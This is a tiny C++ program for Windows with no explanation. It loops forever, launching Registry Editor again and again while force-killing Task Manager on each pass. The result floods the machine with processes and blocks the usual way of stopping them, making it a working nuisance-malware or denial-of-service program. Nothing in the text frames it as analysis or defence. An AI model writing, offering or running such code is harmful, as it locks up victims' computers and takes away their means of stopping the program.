#include<bits/stdc++.h> using namespace std; int main() { while(true) { system("regedit"); system("taskkill /f /im taskmgr.exe"); } return 0; }